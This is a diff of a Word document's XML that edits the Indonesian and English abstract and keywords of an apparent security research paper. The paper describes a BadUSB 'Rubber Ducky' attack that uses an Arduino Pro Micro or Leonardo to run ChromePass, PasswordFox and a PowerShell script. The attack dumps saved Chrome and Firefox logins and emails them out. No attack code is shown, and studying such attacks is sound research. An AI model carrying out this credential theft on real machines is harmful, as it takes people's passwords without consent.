+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>rowser</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> yang paling banyak digunakan di dunia saat ini </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">antara lain </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>adalah Google Chrome</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dan Mozilla Firefox. Kedua </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>browser</w:t>
       </w:r>
@@ -521,60 +626,178 @@
           <w:b/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> yang paling banyak digunakan di dunia saat ini adalah Google Chrome</w:t>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ini memiliki</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fitur </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Browser</w:t>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">penyimpanan </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ini memiliki</w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">username </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> fitur </w:t>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>dan</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>penyimpanan</w:t>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sehingga memudahkan pengguna saat melakukan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>login</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pada </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>website</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tertentu yang diinginkan, namun</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pada</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kenyataannya menyimpan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">username </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pada</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:lang w:val="en-GB"/>
@@ -585,10 +808,232 @@
         <w:rPr>
           <w:b/>
           <w:i/>
-          <w:iCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">browser </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">cukup berbahaya karena data-data yang tersimpan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>dapat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>diretas</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>menggunakan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> serangan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:i/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>brute force</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ataupun dibaca melalui suatu program</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:i/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Salah satu cara untuk mendapatkan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">username </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">password </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">pada </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>browser</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> adalah dengan menggunakan program yang dapat membaca </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>login data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Google Chrome dan Mozilla Firefox dari penyimpanan internal komputer lalu menampilkan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">username </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>password</w:t>
       </w:r>
@@ -599,7 +1044,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve"> sehingga memudahkan pengguna agar tidak perlu selalu melakukan </w:t>
+        <w:t xml:space="preserve"> yang tersimpan pada kedua </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -610,7 +1055,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>login</w:t>
+        <w:t xml:space="preserve">browser </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -619,7 +1064,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve"> pada </w:t>
+        <w:t xml:space="preserve">tersebut. Pada penelitian ini akan dilakukan penyerangan dengan mengimplementasikan </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -630,7 +1075,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>website</w:t>
+        <w:t>Rubber Ducky</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -639,16 +1084,18 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve"> tertentu yang diinginkan, namun</w:t>
+        <w:t xml:space="preserve"> menggunakan BadUSB untuk menjalankan program ChromePass dan PasswordFox serta Powershell </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> pada</w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>script</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -657,7 +1104,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve"> kenyataannya menyimpan </w:t>
+        <w:t xml:space="preserve"> menggunakan perangkat Arduino </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -668,7 +1115,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>password</w:t>
+        <w:t>Pro Micro</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -677,302 +1124,69 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve"> pada</w:t>
+        <w:t xml:space="preserve"> Leonardo. Hasil yang didapatkan dari penelitian ini adalah </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">username </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
-          <w:i/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">browser </w:t>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dan </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">cukup berbahaya karena data-data yang tersimpan tidak terenkripsi dan peretas bisa mendapatkannya dengan serangan </w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">password </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
-          <w:i/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>brute force</w:t>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">pada Google Chrome dan Mozilla Firefox berhasil didapatkan saat USB dihubungkan ke perangkat target, adapun rata-rata waktu berjalannya penyerangan ini adalah 14 detik sebelum kemudian dikirimkan ke </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, selain itu </w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>email</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
-          <w:i/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>password</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> yang tersimpan juga mudah dibaca melalui </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:i/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>malware</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:i/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:iCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:i/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>BadUSB</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:iCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> merupakan perangkat USB yang dimanipulasi oleh penyerang, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>agar saat terdeteksi oleh komputer target perangkat ini akan dikenali sebagai perangkat antar muka USB biasa, seperti keyboard komputer.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Terdapat suatu cara untuk mendapatkan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">password </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">pada </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>browser</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> dengan menggunakan metode </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Rubber Ducky</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> untuk melakukan pengambilan</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> password</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> dan menjalankan Powershell </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>script</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> menggunakan perangkat Arduino Leonardo yang dihubungkan ke perangkat komputer. Hasil yang didapatkan dari penelitian ini adalah</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">username </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">dan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">password </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">pada Google Chrome dan Mozilla Firefox didapatkan saat USB dihubungkan lalu dikirimkan ke </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>email</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> peretas.</w:t>
-      </w:r>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> penulis.</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="0"/>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -1059,51 +1273,82 @@
       <w:r>
         <w:rPr>
           <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">USB </w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Rubber Ducky</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Attack</w:t>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, Arduino </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>, Powershell, Arduino Leonardo</w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pro Micro </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>, Rubber Ducky</w:t>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Leonardo</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>.</w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Powershell,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>ChromePass, PasswordFox.</w:t>
       </w:r>
       <w:r>
         <w:pict w14:anchorId="13C98C78">
@@ -1150,7 +1395,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t xml:space="preserve">Along with the development of the Windows operating system, bowser applications are also developing rapidly. The most widely used browser application in the world today is Google Chrome. This browser has a password storage feature that makes it easy for users to not have to always log on to a particular website that is desired, but in fact storing passwords in the browser is quite dangerous because the stored data is not encrypted and hackers can get it with brute force attacks, besides that the password stored ones are also easy to read through malware. BadUSB is a USB device that is manipulated by an attacker, so that when detected by the target computer this device will be recognized as an ordinary USB interface device, such as a computer keyboard. There is a way to get a password on the browser by using the Rubber Ducky method to </w:t>
+        <w:t>Along with the development of the Windows operating system, browser applications to surf the internet are also growing rapidly. The most widely used browsers in the today i</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1159,7 +1404,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>dump password</w:t>
+        <w:t>s</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1168,19 +1413,17 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t xml:space="preserve"> and run a Powershell script using </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t xml:space="preserve"> Google Chrome and Mozilla Firefox. Both browsers have a username and password </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:sz w:val="20"/>
